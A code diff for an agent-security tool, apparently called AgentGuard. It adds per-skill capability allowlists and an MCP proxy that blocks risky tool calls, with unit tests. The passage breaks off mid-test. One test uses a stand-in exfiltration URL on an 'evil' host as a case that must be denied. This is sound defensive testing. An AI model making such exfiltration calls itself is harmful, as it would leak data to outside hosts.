diff --git a/src/cli.ts b/src/cli.ts index 277609c..5a9d216 100644 --- a/src/cli.ts +++ b/src/cli.ts @@ -22,6 +22,7 @@ import { import type { AgentGuardAgentHost, AgentGuardConfig } from './config.js'; import { SkillScanner } from './scanner/index.js'; import { formatProtectResult, protectAction, exitCodeForDecision } from './runtime/protect.js'; +import { defaultBrokerEvaluator, runMcpBrokerStdio } from './runtime/mcp-broker.js'; import { approvePendingApproval, listPendingApprovals } from './runtime/approvals.js'; import { getDefaultEffectiveRuntimePolicy, loadCachedPolicy, saveCachedPolicy } from './runtime/policy.js'; import type { RuntimeActionType, RuntimeAgentHost } from './runtime/types.js'; @@ -444,6 +445,30 @@ async function main() { process.exitCode = exitCodeForDecision(result.decision, result); }); + program + .command('mcp-broker') + .description('Proxy a downstream MCP server, vetoing tools/call traffic inline against runtime policy') + .argument('', 'Downstream MCP server command to spawn') + .argument('[args...]', 'Arguments passed to the downstream MCP server command') + .option('--agent ', 'Agent host label for audit, e.g. claude-code, codex', 'other') + .option('--source-skill ', 'Skill id to attribute tool calls to (enables capability scoping)') + .action(async (command: string, args: string[], options) => { + const config = ensureConfig(); + const exitCode = await runMcpBrokerStdio({ + command, + args, + evaluate: defaultBrokerEvaluator(config, options.agent as RuntimeAgentHost), + sourceSkill: options.sourceSkill, + onBlocked: (result) => { + console.error( + `[agentguard] blocked MCP tool call: ${result.decision.decision} ` + + `(risk ${result.decision.riskScore}/100, action ${result.decision.actionId})` + ); + }, + }); + process.exitCode = exitCode; + }); + program .command('subscribe') .description('Pull new threat-feed advisories from AgentGuard Cloud and run a self-check against locally installed skills') diff --git a/src/runtime/capabilities.ts b/src/runtime/capabilities.ts new file mode 100644 index 0000000..0a840e6 --- /dev/null +++ b/src/runtime/capabilities.ts @@ -0,0 +1,232 @@ +import { existsSync, readFileSync } from 'node:fs'; +import { join } from 'node:path'; +import { getAgentGuardPaths } from '../config.js'; +import { DEFAULT_CAPABILITY } from '../types/skill.js'; +import type { CapabilityModel } from '../types/skill.js'; +import { domainMatchesPattern, extractDomain } from '../utils/patterns.js'; +import type { EffectiveRuntimePolicy, PolicyReason, RuntimeAction } from './types.js'; + +/** Wildcard skill key applied to every declared-but-unmatched skill. */ +const WILDCARD_SKILL = '*'; + +export const CAPABILITY_REASON_CODES = [ + 'CAPABILITY_EXEC_DENIED', + 'CAPABILITY_NETWORK_DENIED', + 'CAPABILITY_FILE_DENIED', +] as const; + +export function isCapabilityReason(code: string): boolean { + return code.startsWith('CAPABILITY_'); +} + +export interface SkillScope { + /** Effective least-privilege capabilities for the action's skill. */ + capabilities: CapabilityModel; + /** True when the skill has an explicit manifest entry (is confined). */ + scoped: boolean; +} + +/** + * Merge a partial capability override onto the most-restrictive default so an + * omitted field falls back to least privilege (DEFAULT_CAPABILITY). + */ +export function mergeCapabilities(override: Partial): CapabilityModel { + return { + network_allowlist: override.network_allowlist ?? [...DEFAULT_CAPABILITY.network_allowlist], + filesystem_allowlist: override.filesystem_allowlist ?? [...DEFAULT_CAPABILITY.filesystem_allowlist], + exec: override.exec ?? DEFAULT_CAPABILITY.exec, + secrets_allowlist: override.secrets_allowlist ?? [...DEFAULT_CAPABILITY.secrets_allowlist], + ...(override.web3 ? { web3: override.web3 } : {}), + }; +} + +/** + * Resolve the capability scope for an action. A skill is "scoped" only when the + * policy declares an entry for its sourceSkill (or a wildcard entry exists); + * undeclared skills are left unconfined so existing behavior is preserved. + */ +export function resolveSkillScope( + policy: EffectiveRuntimePolicy, + action: RuntimeAction +): SkillScope { + const manifest = policy.skillCapabilities; + if (!manifest) return { capabilities: mergeCapabilities({}), scoped: false }; + + // Precedence: a skill's own entry always wins. The wildcard ("*") is only + // consulted as a fallback for skills WITHOUT an explicit entry. Adding "*" to + // the manifest is itself the operator's explicit opt-in to confine every + // otherwise-undeclared skill; it never overrides a skill-specific scope. + const skillId = action.sourceSkill; + const entry = + (skillId && manifest[skillId]) || + manifest[WILDCARD_SKILL] || + undefined; + + if (!entry) return { capabilities: mergeCapabilities({}), scoped: false }; + return { capabilities: mergeCapabilities(entry), scoped: true }; +} + +/** + * Produce capability-violation reasons for a confined skill. These are emitted + * independently of the OSS threat scanner so a denial is honored even when the + * action looks otherwise benign (the scanner's risk-score gate would auto-allow + * it). Only exec / network / filesystem are enforced at runtime today; the + * secrets allowlist has no runtime action mapping and is intentionally skipped. + */ +export function capabilityScopeReasons( + capabilities: CapabilityModel, + action: RuntimeAction +): PolicyReason[] { + const reasons: PolicyReason[] = []; + + if (capabilities.exec === 'deny' && action.actionType === 'shell') { + reasons.push({ + code: 'CAPABILITY_EXEC_DENIED', + severity: 'high', + title: 'Command execution not permitted for skill', + description: `Skill "${action.sourceSkill}" is not granted the exec capability by its declared scope.`, + evidence: truncate(action.input), + remediation: 'Add `"exec": "allow"` to this skill\'s capability scope to permit command execution.', + }); + } + + if (capabilities.network_allowlist.length > 0) { + const denied = deniedNetworkTargets(action, capabilities.network_allowlist); + if (denied.length > 0) { + reasons.push({ + code: 'CAPABILITY_NETWORK_DENIED', + severity: 'high', + title: 'Network destination outside skill allowlist', + description: `Skill "${action.sourceSkill}" attempted to reach a host not in its network allowlist.`, + evidence: truncate(denied.join(', ')), + remediation: 'Add the host to this skill\'s `network_allowlist` to permit the request.', + }); + } + } + + if ( + capabilities.filesystem_allowlist.length > 0 && + (action.actionType === 'file_read' || action.actionType === 'file_write') && + !filesystemAllowed(action.input, capabilities.filesystem_allowlist) + ) { + reasons.push({ + code: 'CAPABILITY_FILE_DENIED', + severity: 'high', + title: 'File path outside skill allowlist', + description: `Skill "${action.sourceSkill}" attempted to access a path not in its filesystem allowlist.`, + evidence: truncate(action.input), + remediation: 'Add the path (or a `/**` prefix) to this skill\'s `filesystem_allowlist`.', + }); + } + + return reasons; +} + +/** + * Load a local capability manifest (JSON map of skillId -> partial capability). + * + * A *missing* file is the normal unconfigured case and yields an empty manifest + * silently. A *present but malformed* file is different: silently swallowing it + * would drop every per-skill restriction without the operator noticing. We + * therefore surface a loud warning to stderr in that case so the failure is + * observable, then fall back to the unconfined baseline (the OSS threat scanner + * still runs, so this is a return to default behavior, not a new privilege + * grant). We deliberately do not hard-fail the whole runtime here: confinement + * is an opt-in additive layer, and crashing policy resolution over an optional + * file would trade a narrow confinement gap for a total availability outage. + */ +export function loadSkillCapabilityManifest( + manifestPath: string = capabilityManifestPath() +): Record> { + if (!existsSync(manifestPath)) return {}; + try { + const parsed = JSON.parse(readFileSync(manifestPath, 'utf8')) as unknown; + return normalizeManifest(parsed); + } catch (err) { + const detail = err instanceof Error ? err.message : String(err); + process.stderr.write( + `[AgentGuard] WARNING: capability manifest at "${manifestPath}" is present but unreadable/malformed ` + + `(${detail}); per-skill confinement is NOT applied. Fix or remove the file.\n` + ); + return {}; + } +} + +export function capabilityManifestPath(): string { + return process.env.AGENTGUARD_CAPABILITIES_PATH || join(getAgentGuardPaths().home, 'capabilities.json'); +} + +function normalizeManifest(value: unknown): Record> { + if (!value || typeof value !== 'object' || Array.isArray(value)) return {}; + const out: Record> = {}; + for (const [skillId, raw] of Object.entries(value as Record)) { + const entry = normalizeCapabilityEntry(raw); + if (entry) out[skillId] = entry; + } + return out; +} + +function normalizeCapabilityEntry(value: unknown): Partial | null { + if (!value || typeof value !== 'object' || Array.isArray(value)) return null; + const record = value as Record; + const entry: Partial = {}; + const network = stringArray(record.network_allowlist); + const filesystem = stringArray(record.filesystem_allowlist); + const secrets = stringArray(record.secrets_allowlist); + if (network) entry.network_allowlist = network; + if (filesystem) entry.filesystem_allowlist = filesystem; + if (secrets) entry.secrets_allowlist = secrets; + if (record.exec === 'allow' || record.exec === 'deny') entry.exec = record.exec; + return entry; +} + +function stringArray(value: unknown): string[] | undefined { + if (!Array.isArray(value)) return undefined; + return value.filter((item): item is string => typeof item === 'string'); +} + +function deniedNetworkTargets(action: RuntimeAction, allowlist: string[]): string[] { + const denied: string[] = []; + for (const reference of networkReferences(action)) { + const domain = referenceToDomain(reference); + if (!domain) continue; + if (!allowlist.some((pattern) => domainMatchesPattern(domain, pattern))) denied.push(domain); + } + return [...new Set(denied)]; +} + +function networkReferences(action: RuntimeAction): string[] { + if (action.actionType === 'network' || action.actionType === 'browser') { + return [action.input]; + } + if (action.actionType === 'shell') { + return [...action.input.matchAll(/https?:\/\/[^\s'"`<>]+/gi)].map((match) => match[0]); + } + return []; +} + +function referenceToDomain(reference: string): string | null { + const trimmed = reference.trim().replace(/[),.;\]]+$/g, ''); + if (!trimmed) return null; + const urlLike = /^[a-z][a-z0-9+.-]*:\/\//i.test(trimmed) ? trimmed : `https://${trimmed}`; + const domain = extractDomain(urlLike); + return domain ? domain.toLowerCase() : null; +} + +/** Mirror ActionScanner.handleFileOperation allowlist matching. */ +function filesystemAllowed(path: string, allowlist: string[]): boolean { + return allowlist.some((pattern) => { + if (pattern === '*') return true; + if (pattern.endsWith('/**')) return path.startsWith(pattern.slice(0, -3)); + if (pattern.endsWith('/*')) { + const prefix = pattern.slice(0, -2); + const remainder = path.slice(prefix.length); + return path.startsWith(prefix) && !remainder.includes('/'); + } + return path === pattern || path.startsWith(`${pattern}/`); + }); +} + +function truncate(value: string, max = 200): string { + return value.length > max ? `${value.slice(0, max)}…` : value; +} diff --git a/src/runtime/evaluator.ts b/src/runtime/evaluator.ts index d2023f2..70417eb 100644 --- a/src/runtime/evaluator.ts +++ b/src/runtime/evaluator.ts @@ -18,6 +18,7 @@ import type { RuntimeSeverity, } from './types.js'; import { redactPreview, redactReasons } from './redaction.js'; +import { capabilityScopeReasons, isCapabilityReason, resolveSkillScope } from './capabilities.js'; const ONE_MINUTE_MS = 60_000; const TEN_MINUTES_MS = 10 * ONE_MINUTE_MS; @@ -87,7 +88,10 @@ export async function evaluateLocalAction( action: RuntimeAction, options: LocalActionEvaluationOptions = {} ): Promise { - if (isAllowedByCommandPolicy(policy, action)) { + const scope = resolveSkillScope(policy, action); + const scopeReasons = scope.scoped ? capabilityScopeReasons(scope.capabilities, action) : []; + + if (scopeReasons.length === 0 && isAllowedByCommandPolicy(policy, action)) { return { actionId: `act_local_${Date.now()}_${process.pid}`, decision: 'allow', @@ -103,10 +107,14 @@ export async function evaluateLocalAction( const ossReasons = (ossDecision?.risk_tags || []).map((tag, index) => normalizeOssReason(tag, ossDecision?.evidence?.[index], action) ); - const reasons = redactReasons([...customReasons, ...ossReasons]); + const reasons = redactReasons([...scopeReasons, ...customReasons, ...ossReasons]); const riskScore = riskScoreFor(reasons, ossDecision?.risk_level || 'safe'); const riskLevel = riskLevelFor(riskScore); - const decision = shouldAutoAllowRuntimeDecision(riskScore, riskLevel) + // Capability denials are enforced even when the action's risk score would + // otherwise trip the auto-allow gate, so a confined skill cannot escape its + // declared scope by virtue of looking benign to the OSS scanner. + const hasCapabilityDenial = reasons.some((item) => isCapabilityReason(item.code)); + const decision = !hasCapabilityDenial && shouldAutoAllowRuntimeDecision(riskScore, riskLevel) ? 'allow' : decisionFor(policy, reasons, riskLevel, ossDecision?.decision); @@ -686,6 +694,7 @@ function decisionFor( function policyDecisionFor(reasonItem: PolicyReason, policy: EffectiveRuntimePolicy): CloudPolicyDecision | null { const code = reasonItem.code; + if (isCapabilityReason(code)) return policy.mode === 'strict' ? 'block' : 'require_approval'; if (code === 'CUSTOM_BLOCKED_COMMAND' || code === 'DESTRUCTIVE_COMMAND') return policy.decisions.destructiveCommand; if (code === 'DESTRUCTIVE_FILE_OPERATION') return 'require_approval'; if (code === 'SYSTEM_PATH_MUTATION') return 'block'; diff --git a/src/runtime/mcp-broker.ts b/src/runtime/mcp-broker.ts new file mode 100644 index 0000000..6a529e9 --- /dev/null +++ b/src/runtime/mcp-broker.ts @@ -0,0 +1,239 @@ +import { spawn } from 'node:child_process'; +import type { AgentGuardConfig } from '../config.js'; +import { protectAction, type ProtectResult } from './protect.js'; +import type { RuntimeAgentHost } from './types.js'; + +/** + * Inline MCP enforcement broker. + * + * The AgentGuard MCP server (`mcp-server.ts`) is advisory: the agent has to + * choose to call `action_scanner_decide`. This broker is the opposite — it sits + * transparently in front of a downstream MCP server, forwards JSON-RPC traffic + * untouched, but intercepts `tools/call` requests and runs them through the same + * runtime policy used by the hook path (`protectAction`). A blocked call is + * never forwarded; instead a JSON-RPC error response is synthesized back to the + * agent so the tool simply appears to fail. + * + * A stdio proxy is non-interactive, so there is no channel to prompt the user + * mid-stream. The broker therefore fails closed: both `block` and + * `require_approval` decisions stop the call. Low-risk actions (which + * `protectAction` reports as `null`) are forwarded unchanged. + * + * Scope: stdio transport only. That is the sole MCP transport AgentGuard + * targets (see `mcp-server.ts` and the `type: 'stdio'` installer registration), + * so an SSE/HTTP proxy is intentionally out of scope. + */ + +export interface JsonRpcMessage { + jsonrpc?: string; + id?: string | number | null; + method?: string; + params?: Record; +} + +/** Evaluate a tool call. Returns a ProtectResult, or null when there is no opinion (low risk). */ +export type BrokerEvaluator = (rawInput: Record) => Promise; + +export interface BrokerOptions { + evaluate: BrokerEvaluator; + sourceSkill?: string; +} + +export interface ClientLineOutcome { + /** Forward the original line unchanged to the downstream server. */ + forward: boolean; + /** A JSON-RPC error line to write back to the client instead of forwarding. */ + injectToClient?: string; + /** The blocking decision, for audit/logging. */ + blocked?: ProtectResult; +} + +/** JSON-RPC implementation-defined server error code for an AgentGuard veto. */ +const JSONRPC_BLOCKED_CODE = -32001; + +export function parseJsonRpc(line: string): JsonRpcMessage | null { + const trimmed = line.trim(); + if (!trimmed) return null; + try { + const parsed = JSON.parse(trimmed) as unknown; + if (!parsed || typeof parsed !== 'object' || Array.isArray(parsed)) return null; + return parsed as JsonRpcMessage; + } catch { + return null; + } +} + +export function isToolCall(message: JsonRpcMessage | null): message is JsonRpcMessage { + return Boolean( + message && + message.method === 'tools/call' && + message.params && + typeof message.params === 'object' + ); +} + +export function toolCallRawInput(message: JsonRpcMessage, options: BrokerOptions): Record { + const params = (message.params || {}) as Record; + const args = params.arguments && typeof params.arguments === 'object' ? params.arguments : {}; + return { + tool_name: typeof params.name === 'string' ? params.name : 'mcp_tool', + tool_input: args, + ...(options.sourceSkill ? { sourceSkill: options.sourceSkill } : {}), + }; +} + +export function blockedResponse(message: JsonRpcMessage, result: ProtectResult): string { + const reasons = result.decision.reasons + .map((reason) => reason.title) + .filter(Boolean) + .slice(0, 3) + .join(', '); + return JSON.stringify({ + jsonrpc: '2.0', + id: message.id ?? null, + error: { + code: JSONRPC_BLOCKED_CODE, + message: + `Blocked by AgentGuard: ${result.decision.decision} ` + + `(risk ${result.decision.riskScore}/100${reasons ? `; ${reasons}` : ''})`, + data: { + decision: result.decision.decision, + actionId: result.decision.actionId, + riskScore: result.decision.riskScore, + riskLevel: result.decision.riskLevel, + reasons: result.decision.reasons, + }, + }, + }); +} + +function isBlockingDecision(result: ProtectResult): boolean { + return result.decision.decision === 'block' || result.decision.decision === 'require_approval'; +} + +/** + * Decide what to do with a single client→server line. Non-tool-call traffic and + * unparseable lines are forwarded untouched so the broker never breaks the + * protocol; only `tools/call` requests are evaluated. + */ +export async function evaluateClientLine(line: string, options: BrokerOptions): Promise { + const message = parseJsonRpc(line); + if (!isToolCall(message)) return { forward: true }; + + const result = await options.evaluate(toolCallRawInput(message, options)); + if (result && isBlockingDecision(result)) { + return { forward: false, injectToClient: blockedResponse(message, result), blocked: result }; + } + return { forward: true }; +} + +/** Newline-delimited framing that tolerates chunk boundaries splitting a JSON message. */ +export function createLineBuffer(onLine: (line: string) => void): { + push: (chunk: string) => void; + flush: () => void; +} { + let buffer = ''; + return { + push(chunk: string): void { + buffer += chunk; + let index = buffer.indexOf('\n'); + while (index >= 0) { + onLine(buffer.slice(0, index)); + buffer = buffer.slice(index + 1); + index = buffer.indexOf('\n'); + } + }, + flush(): void { + if (buffer.length > 0) { + onLine(buffer); + buffer = ''; + } + }, + }; +} + +export function defaultBrokerEvaluator( + config: AgentGuardConfig, + agentHost: RuntimeAgentHost = 'other' +): BrokerEvaluator { + return (rawInput) => protectAction({ config, rawInput, agentHost, phase: 'pre' }); +} + +export interface RunMcpBrokerStdioOptions extends BrokerOptions { + command: string; + args?: string[]; + stdin?: NodeJS.ReadableStream; + stdout?: NodeJS.WritableStream; + stderr?: NodeJS.WritableStream; + onBlocked?: (result: ProtectResult) => void; +} + +/** + * Spawn a downstream MCP server and proxy stdio between it and the client, + * vetoing tool calls inline. Resolves with the child's exit code. + */ +export function runMcpBrokerStdio(options: RunMcpBrokerStdioOptions): Promise { + const child = spawn(options.command, options.args ?? [], { stdio: ['pipe', 'pipe', 'pipe'] }); + const clientOut = options.stdout ?? process.stdout; + const clientErr = options.stderr ?? process.stderr; + const clientIn = options.stdin ?? process.stdin; + + // Single writer for the client stream. Downstream stdout chunks and the + // broker's own synthesized JSON-RPC errors share `clientOut`; funnelling both + // through one serialized queue keeps each message atomic so an injected error + // can never be spliced into the middle of a downstream response. The queue + // also honors backpressure (waits for `drain`) instead of unbounded buffering. + let writeChain: Promise = Promise.resolve(); + const writeClient = (data: string | Buffer): void => { + writeChain = writeChain.then( + () => + new Promise((res) => { + if (clientOut.write(data)) res(); + else clientOut.once('drain', () => res()); + }) + ); + }; + + child.stdout.on('data', (chunk: Buffer) => writeClient(chunk)); + child.stderr.on('data', (chunk: Buffer) => clientErr.write(chunk)); + + // Serialize per-line handling so forwarding order is preserved across async + // policy evaluations. + let chain: Promise = Promise.resolve(); + const buffer = createLineBuffer((line) => { + chain = chain.then(async () => { + if (!line.trim()) { + child.stdin.write(`${line}\n`); + return; + } + const outcome = await evaluateClientLine(line, options); + if (outcome.forward) { + child.stdin.write(`${line}\n`); + } else if (outcome.injectToClient) { + writeClient(`${outcome.injectToClient}\n`); + if (outcome.blocked) options.onBlocked?.(outcome.blocked); + } + }); + }); + + clientIn.on('data', (chunk: Buffer) => buffer.push(chunk.toString('utf8'))); + clientIn.on('end', () => { + buffer.flush(); + chain.then(() => child.stdin.end()).catch(() => child.stdin.end()); + }); + + // Resolve only after the child has exited AND every buffered evaluation plus + // its client write has drained. Resolving on `exit` alone could drop a + // synthesized block response that was still in flight when the child died. + // The child's own exit code is propagated unchanged. + return new Promise((resolve) => { + const settle = (code: number) => { + chain + .then(() => writeChain) + .then(() => resolve(code)) + .catch(() => resolve(code)); + }; + child.on('exit', (code) => settle(code ?? 0)); + child.on('error', () => settle(1)); + }); +} diff --git a/src/runtime/policy.ts b/src/runtime/policy.ts index 3fd7ebb..009081c 100644 --- a/src/runtime/policy.ts +++ b/src/runtime/policy.ts @@ -1,5 +1,7 @@ import { existsSync, mkdirSync, readFileSync, writeFileSync } from 'node:fs'; import { dirname } from 'node:path'; +import type { CapabilityModel } from '../types/skill.js'; +import { loadSkillCapabilityManifest } from './capabilities.js'; import type { EffectiveRuntimePolicy } from './types.js'; export function getDefaultEffectiveRuntimePolicy(): EffectiveRuntimePolicy { @@ -65,7 +67,7 @@ export async function resolveRuntimePolicy(options: { const cloudPolicy = await options.fetchPolicy(); if (cloudPolicy) { saveCachedPolicy(options.cachePath, cloudPolicy); - return { policy: cloudPolicy, source: 'cloud' }; + return { policy: withLocalCapabilityManifest(cloudPolicy), source: 'cloud' }; } } catch { // Fall through to cache/default. @@ -73,6 +75,22 @@ export async function resolveRuntimePolicy(options: { } const cached = loadCachedPolicy(options.cachePath); - if (cached) return { policy: cached, source: 'cache' }; - return { policy: getDefaultEffectiveRuntimePolicy(), source: 'default' }; + if (cached) return { policy: withLocalCapabilityManifest(cached), source: 'cache' }; + return { policy: withLocalCapabilityManifest(getDefaultEffectiveRuntimePolicy()), source: 'default' }; +} + +/** + * Overlay the local capability manifest (`capabilities.json`) onto the resolved + * policy. Local entries take precedence over any cloud-supplied scope so an + * operator can confine a skill without a cloud round-trip. Returns the policy + * unchanged when no local manifest entries exist. + */ +function withLocalCapabilityManifest(policy: EffectiveRuntimePolicy): EffectiveRuntimePolicy { + const local = loadSkillCapabilityManifest(); + if (Object.keys(local).length === 0) return policy; + const merged: Record> = { + ...(policy.skillCapabilities || {}), + ...local, + }; + return { ...policy, skillCapabilities: merged }; } diff --git a/src/runtime/types.ts b/src/runtime/types.ts index 60cc09e..77db55e 100644 --- a/src/runtime/types.ts +++ b/src/runtime/types.ts @@ -1,3 +1,5 @@ +import type { CapabilityModel } from '../types/skill.js'; + export type CloudPolicyDecision = 'allow' | 'warn' | 'require_approval' | 'block'; export type RuntimeRiskLevel = 'safe' | 'low' | 'medium' | 'high' | 'critical'; export type RuntimeSeverity = 'info' | 'low' | 'medium' | 'high' | 'critical'; @@ -49,6 +51,13 @@ export interface EffectiveRuntimePolicy { blockedCommandPatterns: string[]; allowedCommandPatterns: string[]; approvalActionTypes: RuntimeActionType[]; + /** + * Per-skill capability scopes keyed by initiating skill id. When an entry + * exists for an action's sourceSkill, the skill is "declared" and confined + * to the listed capabilities (least privilege; omitted fields fall back to + * DEFAULT_CAPABILITY). Skills with no entry keep the permissive default. + */ + skillCapabilities?: Record>; network: { defaultOutbound: CloudPolicyDecision; blockedDomains: string[]; diff --git a/src/tests/capabilities.test.ts b/src/tests/capabilities.test.ts new file mode 100644 index 0000000..fb4c079 --- /dev/null +++ b/src/tests/capabilities.test.ts @@ -0,0 +1,236 @@ +import { describe, it } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, writeFileSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { evaluateLocalAction } from '../runtime/evaluator.js'; +import { getDefaultEffectiveRuntimePolicy, resolveRuntimePolicy } from '../runtime/policy.js'; +import { loadSkillCapabilityManifest } from '../runtime/capabilities.js'; +import type { CapabilityModel } from '../types/skill.js'; +import type { EffectiveRuntimePolicy, RuntimeAction } from '../runtime/types.js'; + +function policyWithScopes( + scopes: Record>, + overrides: Partial = {} +): EffectiveRuntimePolicy { + return { ...getDefaultEffectiveRuntimePolicy(), skillCapabilities: scopes, ...overrides }; +} + +function action(partial: Partial): RuntimeAction { + return { + sessionId: 'sess_caps', + agentHost: 'openclaw', + actionType: 'shell', + toolName: 'exec', + input: '', + ...partial, + }; +} + +describe('Per-skill capability scopes', () => { + it('leaves undeclared skills unconfined', async () => { + const policy = policyWithScopes({ 'other-skill': { exec: 'deny' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'my-skill', input: 'echo hello' }) + ); + + assert.equal(decision.decision, 'allow'); + assert.ok(!decision.reasons.some((r) => r.code.startsWith('CAPABILITY_'))); + }); + + it('does not confine when the policy declares no scopes at all', async () => { + const policy = getDefaultEffectiveRuntimePolicy(); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'my-skill', input: 'echo hello' }) + ); + + assert.ok(!decision.reasons.some((r) => r.code.startsWith('CAPABILITY_'))); + }); + + it('denies exec for a declared skill without the exec capability', async () => { + const policy = policyWithScopes({ 'confined-skill': { exec: 'deny' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'confined-skill', input: 'echo hello' }) + ); + + assert.equal(decision.decision, 'require_approval'); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); + + it('blocks exec under strict mode for a confined skill', async () => { + const policy = policyWithScopes({ 'confined-skill': { exec: 'deny' } }, { mode: 'strict' }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'confined-skill', input: 'echo hello' }) + ); + + assert.equal(decision.decision, 'block'); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); + + it('allows exec when the declared scope grants it', async () => { + const policy = policyWithScopes({ 'confined-skill': { exec: 'allow' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'confined-skill', input: 'echo hello' }) + ); + + assert.ok(!decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); + + it('denies network destinations outside the skill allowlist', async () => { + const policy = policyWithScopes({ + 'net-skill': { network_allowlist: ['api.allowed.com'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'net-skill', + actionType: 'network', + toolName: 'fetch', + input: 'https://evil.example.com/exfil', + }) + ); + + assert.ok(['require_approval', 'block'].includes(decision.decision)); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_NETWORK_DENIED')); + }); + + it('permits network destinations inside the skill allowlist', async () => { + const policy = policyWithScopes({ + 'net-skill': { network_allowlist: ['api.allowed.com'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'net-skill', + actionType: 'network', + toolName: 'fetch', + input: 'https://api.allowed.com/v1/data', + }) + ); + + assert.ok(!decision.reasons.some((r) => r.code === 'CAPABILITY_NETWORK_DENIED')); + }); + + it('denies file paths outside the skill filesystem allowlist', async () => { + const policy = policyWithScopes({ + 'fs-skill': { filesystem_allowlist: ['/workspace/**'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'fs-skill', + actionType: 'file_read', + toolName: 'read', + input: '/home/other/notes.txt', + }) + ); + + assert.equal(decision.decision, 'require_approval'); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_FILE_DENIED')); + }); + + it('permits file paths inside the skill filesystem allowlist', async () => { + const policy = policyWithScopes({ + 'fs-skill': { filesystem_allowlist: ['/workspace/**'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'fs-skill', + actionType: 'file_read', + toolName: 'read', + input: '/workspace/project/notes.txt', + }) + ); + + assert.ok(!decision.reasons.some((r) => r.code === 'CAPABILITY_FILE_DENIED')); + }); + + it('applies the wildcard scope to any declared-but-unmatched skill', async () => { + const policy = policyWithScopes({ '*': { exec: 'deny' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'whatever-skill', input: 'echo hello' }) + ); + + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); +}); + +describe('Capability manifest loading', () => { + it('reads a manifest file and normalizes entries', () => { + const dir = mkdtempSync(join(tmpdir(), 'agentguard-caps-')); + const path = join(dir, 'capabilities.json'); + writeFileSync( + path, + JSON.stringify({ + 'skill-a': { exec: 'deny', network_allowlist: ['api.good.com'], bogus: 1 }, + 'skill-b': 'not-an-object', + }) + ); + + const manifest = loadSkillCapabilityManifest(path); + assert.deepEqual(manifest['skill-a'], { exec: 'deny', network_allowlist: ['api.good.com'] }); + assert.ok(!('skill-b' in manifest)); + }); + + it('returns an empty manifest for a missing file', () => { + assert.deepEqual(loadSkillCapabilityManifest(join(tmpdir(), 'does-not-exist-caps.json')), {}); + }); + + it('surfaces a stderr warning for a present-but-malformed manifest instead of swallowing it', () => { + const dir = mkdtempSync(join(tmpdir(), 'agentguard-caps-bad-')); + const path = join(dir, 'capabilities.json'); + writeFileSync(path, '{ this is not valid json '); + + const original = process.stderr.write.bind(process.stderr); + let captured = ''; + (process.stderr as { write: unknown }).write = (chunk: string | Uint8Array): boolean => { + captured += chunk.toString(); + return true; + }; + try { + const manifest = loadSkillCapabilityManifest(path); + assert.deepEqual(manifest, {}, 'falls back to the unconfined baseline'); + } finally { + (process.stderr as { write: unknown }).write = original; + } + + assert.match(captured, /AgentGuard.*WARNING/); + assert.match(captured, /malformed/); + assert.ok(captured.includes(path), 'warning names the offending file'); + }); + + it('overlays the local manifest onto the resolved policy with local precedence', async () => { + const dir = mkdtempSync(join(tmpdir(), 'agentguard-caps-resolve-')); + const manifestPath = join(dir, 'capabilities.json'); + writeFileSync(manifestPath, JSON.stringify({ 'skill-a': { exec: 'deny' } })); + const prev = process.env.AGENTGUARD_CAPABILITIES_PATH; + process.env.AGENTGUARD_CAPABILITIES_PATH = manifestPath; + + try { + const cloudPolicy: EffectiveRuntimePolicy = { + ...getDefaultEffectiveRuntimePolicy(), + skillCapabilities: { + 'skill-a': { exec: 'allow' }, + 'skill-b': { exec: 'allow' }, + }, + }; + const { policy } = await resolveRuntimePolicy({ + cachePath: join(dir, 'policy-cache.json'), + fetchPolicy: async () => cloudPolicy, + }); + + assert.equal(policy.skillCapabilities?.['skill-a']?.exec, 'deny'); + assert.equal(policy.skillCapabilities?.['skill-b']?.exec, 'allow'); + } finally { + if (prev === undefined) delete process.env.AGENTGUARD_CAPABILITIES_PATH; + else process.env.AGENTGUARD_CAPABILITIES_PATH = prev; + } + }); +}); diff --git a/src/tests/mcp-broker.test.ts b/src/tests/mcp-broker.test.ts new file mode 100644 index 0000000..5f22349 --- /dev/null +++ b/src/tests/mcp-broker.test.ts @@ -0,0 +1,199 @@ +import { describe, it } from 'node:test'; +import assert from 'node:assert/strict'; +import { PassThrough } from 'node:stream'; +import { + createLineBuffer, + evaluateClientLine, + isToolCall, + parseJsonRpc, + runMcpBrokerStdio, + toolCallRawInput, + type BrokerEvaluator, +} from '../runtime/mcp-broker.js'; +import type { ProtectResult } from '../runtime/protect.js'; +import type { CloudPolicyDecision } from '../runtime/types.js'; + +function protectResult(decision: CloudPolicyDecision): ProtectResult { + return { + decision: { + actionId: 'act_test_1', + decision, + riskScore: decision === 'block' ? 95 : 55, + riskLevel: decision === 'block' ? 'critical' : 'high', + reasons: [{ code: 'TEST_REASON', severity: 'high', title: 'Test reason', description: 'x' }], + policyVersion: 'test', + }, + } as ProtectResult; +} + +const toolCall = (id: number, name: string, args: Record) => + JSON.stringify({ jsonrpc: '2.0', id, method: 'tools/call', params: { name, arguments: args } }); + +describe('MCP broker — interception core', () => { + const denyEvaluator: BrokerEvaluator = async () => protectResult('block'); + const nullEvaluator: BrokerEvaluator = async () => null; + + it('forwards non-tool-call messages without evaluating', async () => { + let called = false; + const evaluate: BrokerEvaluator = async () => { + called = true; + return protectResult('block'); + }; + const line = JSON.stringify({ jsonrpc: '2.0', id: 1, method: 'initialize', params: {} }); + const outcome = await 